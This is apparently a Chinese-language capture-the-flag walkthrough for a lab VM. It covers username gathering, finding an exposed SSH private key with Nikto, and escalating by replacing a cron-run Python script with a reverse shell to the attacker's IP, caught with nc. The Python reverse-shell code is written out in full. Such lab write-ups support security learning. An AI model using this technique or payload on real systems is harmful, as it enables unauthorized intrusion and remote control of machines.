环境

Kali ip 192.168.56.102

Smb 靶机ip 192.168.56.101

0x01信息探测

首页发现有类似用户名的信息 先记录下来

Martin N

Hadi M

Jimmy S

Nikto进行对http服务的信息探测

发现rsa敏感密钥文件  wget到kali下

重命名为id_rsa 作为我们ssh的登录的私钥

通过前面收集类似的用户名 作为ssh登录尝试

将私钥文件权限改成可读可写

登录成功

查看有哪些用户名

0x02 提升权限 查找flag

cat /etc/passwd     查看所有用户的列表

cat /etc/group       查看用户组

find / -user 用户名  查看属于某些用户的文件

/tmp   查看缓冲文件目录

查看所有用户的列表

查看用户组

查看缓冲文件目录

因为缓冲文件目录下的文件都是隐藏 需要使用ls -alh查看

通过 /etc/crontab 文件,设定系统定期执行的任务,编辑,需要root权限。不同的用户都可以有不同的定时任务

查看计划文件

可以发现

Jimmy用户定期执行python /tmp/sekurity.py文件

我们可以把执行的文件改成我们的python反弹shell

#!/usr/bin/python

import os,subprocess,socket

s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)

s.connect((“攻击机IP地址”,”攻击机监听端口”))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call([“/bin/sh”,”-i”])

通过ssh上传至我们的靶机

然后通过nc -lvp 端口 进行shell监听

最新文章

  1. BZOJ 1047 二维单调队列
  2. javascript--Math相关
  3. py-faster-rcnn +cudnn V5
  4. AngularJS Select(选择框)
  5. Python 7 —— 扩展与嵌入
  6. MySQL5:性能优化
  7. C#入门基础三四
  8. Inventory of the materials to teach you how to query a date certain combination of dimensions
  9. [JAVA词形还原工具]Snowball
  10. python install 2.7.10
  11. javascript 倒计时跳转.
  12. [Leetcode][016] 3Sum Closest (Java)
  13. 一个Hadoop难以查找的错误
  14. fdisk添加磁盘
  15. 修改nagios密码和遇到的问题
  16. Okio 之初探黄龙
  17. Java .classpath文件Classpath entry org.maven.eclipse.MAVEN2_CLASSPATH_CONTAINER will not be exported or published异常解决办法
  18. golang子进程的启动和停止,mac与linux的区别
  19. PHP语言学习之php-fpm 三种运行模式
  20. C#窗口禁止移动的方法

热门文章

  1. 利用HBuilder打包Vue开发的webapp为app
  2. android 拍照 相册 剪切以及显示功能
  3. 基于DevExpress的SpreadsheetControl实现对Excel的打开、预览、保存、另存为、打印(附源码下载)
  4. 【学习笔记】第四章 Python3核心技术与实践--列表与元组
  5. react navigation goBack()返回到任意页面(不集成redux) 二
  6. (一)spring 高级装配-@Profile
  7. 2019年9月3日安卓凯立德全分辨率(路况)夏季版C3551-C7M24-3K21J25懒人包
  8. [C++]类的设计(2)——拷贝控制(析构和三五法则)
  9. FPGA 开发详细流程你了解吗?
  10. 判断java中最多的词组